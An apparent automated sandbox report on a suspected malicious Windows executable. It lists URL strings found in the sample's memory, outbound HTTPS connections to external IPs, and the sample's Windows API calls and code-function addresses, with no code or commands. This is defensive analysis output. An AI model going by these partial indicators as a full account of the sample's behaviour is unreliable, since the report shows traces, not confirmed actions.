Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.00000000382C0000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039240000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039228000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003934E000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039179000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391F2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.000000003939C000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039161000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391BC000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: 4kobC6KGC3.exe, 00000002.00000002.54538621469.00000000391D2000.00000004.00000800.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54538621469.0000000039390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: 4kobC6KGC3.exe, 00000002.00000002.54536508892.000000003812C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 142.251.32.110:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49768 version: TLS 1.2

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040542B

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403359

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_70471B5F	0_2_70471B5F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00404C68	2_2_00404C68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_0040698E	2_2_0040698E
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FC600	2_2_075FC600
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F5370	2_2_075F5370
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FC330	2_2_075FC330
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FC060	2_2_075FC060
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F6FC8	2_2_075F6FC8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FCE70	2_2_075FCE70
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F9DE0	2_2_075F9DE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FBBC8	2_2_075FBBC8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FCBA0	2_2_075FCBA0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FE988	2_2_075FE988
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FC8D0	2_2_075FC8D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F3E09	2_2_075F3E09
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FBD92	2_2_075FBD92
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F3AB1	2_2_075F3AB1
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FF95F	2_2_075FF95F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075FE978	2_2_075FE978
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_075F29EC	2_2_075F29EC
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD72A90	2_2_3AD72A90
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD70B30	2_2_3AD70B30
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD71850	2_2_3AD71850
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD75148	2_2_3AD75148
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD79668	2_2_3AD79668
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD71FA8	2_2_3AD71FA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7CDF0	2_2_3AD7CDF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7FA00	2_2_3AD7FA00
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD70B29	2_2_3AD70B29
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD71841	2_2_3AD71841
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD70040	2_2_3AD70040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD70006	2_2_3AD70006
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7F9F1	2_2_3AD7F9F1
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD75142	2_2_3AD75142
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD71F9F	2_2_3AD71F9F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD78CC0	2_2_3AD78CC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7EC18	2_2_3AD7EC18
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD7EC07	2_2_3AD7EC07
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AD79D38	2_2_3AD79D38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBA6E8	2_2_3AFBA6E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBAD40	2_2_3AFBAD40
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB22F1	2_2_3AFB22F1
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB08F0	2_2_3AFB08F0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB82F0	2_2_3AFB82F0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBE8F7	2_2_3AFBE8F7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB08E3	2_2_3AFB08E3
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB82E1	2_2_3AFB82E1
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBB6D8	2_2_3AFBB6D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBA6D8	2_2_3AFBA6D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB52C8	2_2_3AFB52C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBD6C8	2_2_3AFBD6C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBB6C7	2_2_3AFBB6C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB52BB	2_2_3AFB52BB
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB38B8	2_2_3AFB38B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBF6B8	2_2_3AFBF6B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBD6B7	2_2_3AFBD6B7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB1EA8	2_2_3AFB1EA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBF6A7	2_2_3AFBF6A7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB0498	2_2_3AFB0498
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7E98	2_2_3AFB7E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB1E98	2_2_3AFB1E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBA292	2_2_3AFBA292
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBA290	2_2_3AFBA290
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB048B	2_2_3AFB048B
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBC488	2_2_3AFBC488
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7E88	2_2_3AFB7E88
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBE478	2_2_3AFBE478
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBC478	2_2_3AFBC478
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB4E70	2_2_3AFB4E70
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBE468	2_2_3AFBE468
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB4E6F	2_2_3AFB4E6F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB3460	2_2_3AFB3460
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB1A50	2_2_3AFB1A50
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBB248	2_2_3AFBB248
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB0040	2_2_3AFB0040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7A40	2_2_3AFB7A40
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB9E3A	2_2_3AFB9E3A
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB9E38	2_2_3AFB9E38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBD238	2_2_3AFBD238
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBB238	2_2_3AFBB238
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7A30	2_2_3AFB7A30
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBAC36	2_2_3AFBAC36
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBD229	2_2_3AFBD229
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB6428	2_2_3AFB6428
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBF228	2_2_3AFBF228
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBF219	2_2_3AFBF219
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB4A18	2_2_3AFB4A18
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB001E	2_2_3AFB001E
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB3008	2_2_3AFB3008
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB4A08	2_2_3AFB4A08
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB15F8	2_2_3AFB15F8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB8FF8	2_2_3AFB8FF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBBFF8	2_2_3AFBBFF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB2FF8	2_2_3AFB2FF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB75E8	2_2_3AFB75E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBDFE8	2_2_3AFBDFE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB15E8	2_2_3AFB15E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB99E2	2_2_3AFB99E2
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB99E0	2_2_3AFB99E0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBBFE7	2_2_3AFBBFE7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBDFD8	2_2_3AFBDFD8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5FD0	2_2_3AFB5FD0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB45C0	2_2_3AFB45C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5FC0	2_2_3AFB5FC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB45BF	2_2_3AFB45BF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB2BB0	2_2_3AFB2BB0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBCDA8	2_2_3AFBCDA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB11A0	2_2_3AFB11A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB8BA0	2_2_3AFB8BA0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBED98	2_2_3AFBED98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBCD98	2_2_3AFBCD98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7192	2_2_3AFB7192
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB8B91	2_2_3AFB8B91
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB7190	2_2_3AFB7190
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB1190	2_2_3AFB1190
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB9588	2_2_3AFB9588
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBED88	2_2_3AFBED88
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5B78	2_2_3AFB5B78
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB9578	2_2_3AFB9578
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5B6B	2_2_3AFB5B6B
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB4168	2_2_3AFB4168
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBBB68	2_2_3AFBBB68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB415B	2_2_3AFB415B
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB2758	2_2_3AFB2758
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBDB58	2_2_3AFBDB58
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBBB58	2_2_3AFBBB58
